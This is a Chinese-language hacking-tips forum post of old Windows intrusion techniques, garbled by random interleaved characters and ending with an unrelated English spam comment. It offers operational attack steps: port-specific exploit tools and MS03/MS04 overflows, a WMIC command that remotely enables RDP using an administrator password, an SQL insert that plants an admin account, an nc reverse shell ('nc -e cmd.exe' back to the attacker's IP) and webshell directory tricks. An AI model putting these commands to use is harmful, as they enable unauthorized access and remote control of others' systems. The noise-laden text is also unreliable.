0 P0 G( B9 W! B! T3 { 0 p% N, J6 M+ V% I' \5 |6. 554端口 用real554.exe入侵。 6129端口 用dameware6129.exe入侵。 系统漏洞 利用135、445端口,用ms03026、ms03039、ms03049、ms04011漏洞, 进行溢出入侵。 3127等端口 可以利用doom病毒开的端口,用nodoom.exe入侵。(可用mydoomscan.exe查) ' Q1 N, p6 u0 `# x% [# f% L$ B ! Q8 r: e* @ U. C* B" Y6 p' ^# n# b
) u& t3 I! K$ N' X: W
CMD加密注册表位置& ~; e5 C' Y5 a
(1)HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor + ~+ ]: y9 W+ X: f7 J4 w3 QAutoRun - q0 b& q% ?. |+ L9 X9 G% H# k# E" i& L4 \
(2)HKEY_CURRENT_USER\Software\Microsoft\Command Processor3 R) {; L5 T$ u) {& O X+ p
AutoRun3 H' [& H0 a9 n$ D, Z. o+ M
9 D3 A P3 E4 `" c
" a* s, U& X' a7 S. e在找注入时搜索Hidden,把他改成test! U3 @' g% x8 J y, w: A/ H
0 H$ D- v) u) F% N7 P9 b/ @5 u) y / P) I! n' r5 t2 A# ?$ D4 ~5 ^/ Y h+ J( ?* Z9 Y) o" Q5 [& }. D
mstsc /v:IP /console . R+ [" g0 S1 V e/ b) | M1 ^# l3 N5 Q; ^9 x! W
. b8 W) ?6 b- x
一句话开3389: # t" A5 y' F4 t. D! E1 c - B' c- I% h! Z# y9 M, p最近我在网上看到新出了一种方法,一句话开3389,不过好像听说只能用于2003系统,唉,还是写出来和大家分享一下吧.很简单的,wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1 adh=Kp e!w 8 kw`=wSH> , q3 {2 t6 v) V- l- `4 x开远程:WMIC /node:"远程机器名" /user:"administrator" /password:"lcx" RDTOGGLE WHERE ServerName='远程机器名' call SetAllowTSConnections 1 就是这样了,其实还有其他的一些方法开2003的3389,我这里也不多作介绍了,大家有空上网一查就知道了./ y t( `) r1 K+ R$ y+ F; |
3 Y% u3 ~( @9 e$ s0 W3 a ` s2 ^" v0 S; H/ ~7 C0 r
知道表名,字段,使用SQL语句在ACCESS数据库中加个用户名及密码语句如下:( ^8 i. F/ T {7 o
Insert into admin(user,pwd) values('test','test') , S1 T! K1 s8 J; D& J% G 1 _# @ T8 L) P3 b8 Y9 A, _* h6 G' T3 |$ t
NC反弹 : Y8 w; v1 ]7 ~2 w) n1 D) h先在本机执行: nc -vv -lp 监听的端口 (自己执行) % i# g$ I- ~# e+ x) h" J+ T2 D
然后在服务器上执行: nc -e cmd.exe 自己的IP 和监听的端口 (对方执行)9 J' X1 }, w$ H/ O0 I) t n+ g
6 ~9 b" d( v1 @. N- k) u: U6 L2 r
9 @: r5 h% p. U7 `& k2 v+ d
在脚本入侵过程中要经常常试用%00来确认下参数是否有问题 ' F. f0 d e. Y, b: t8 J/ I5 t( {. w c4 |7 M' y. V; Z- ]
有时候我们入侵的时候,在webshell没有办法列举网站的目录包括dir也不行的时候,这个时候可以尝试用DOS命令SUBST转移目录 9 G( W& ~/ P5 f! _例如:# g' z* L+ `; |7 I% [- Q
subst k: d:\www\ 用d盘www目录替代k盘, l c3 G# q& W- j# {6 V4 H
subst k: /d 解除K盘代替作者: 匿名 时间: 2017-12-20 02:36
We are a group of volunteers and starting a new scheme in our community.
Your web site offered us with valuable information to work on. You've done a formidable job and our entire community will
be grateful to you.
Website: Antispur Duo Forte proprieta